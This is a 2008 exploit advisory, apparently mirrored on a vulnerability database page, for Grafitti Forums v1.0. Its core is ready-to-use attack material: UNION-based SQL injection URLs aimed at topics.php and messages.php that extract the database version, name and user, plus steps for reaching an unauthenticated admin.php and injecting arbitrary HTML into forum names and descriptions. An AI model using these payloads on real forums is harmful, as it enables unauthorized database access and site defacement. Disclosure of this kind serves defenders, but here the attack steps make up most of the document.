Lucene search
graffiti-sql.txt
Remote SQL Injection and HTML Injection in Grafitti Forums v1.
Show more
`############################################################################################################
[+] Grafitti Forums v1.0 Remote SQL Injection/HTML Injection
[+] Discovered By SirGod
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke
############################################################################################################
[+] Remote SQL Injection Vulnerabilities
PoC :
http://[target]/[path]/topics.php?f=[SQL]
Example :
http://127.0.0.1/topics.php?f=-1 union all select version()--
http://127.0.0.1/topics.php?f=-1 union ll select database()--
http://127.0.0.1/topics.php?f=-1 union all select user()--
PoC :
http://[target]/[path]/messages.php?t=[SQL]
Example :
http://127.0.0.1/messages.php?t=-1 union all select version()--
http://127.0.0.1/messages.php?t=-1 union ll select database()--
http://127.0.0.1/messages.php?t=-1 union all select user()--
[+] HTML Injection
1. Just go to :
http://[target]/[path]/admin.php
2. No Authentication Required !
3. Click Add Forum .
4. Complete the forum name : Owned etc.. 50 chars maximum. (also you can use HTML Code) .
5. Complete the forum description with any HTML Code (100 chars max) .
############################################################################################################
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo11 Sep 2008 00:00Current
7.4High risk
Vulners AI Score7.4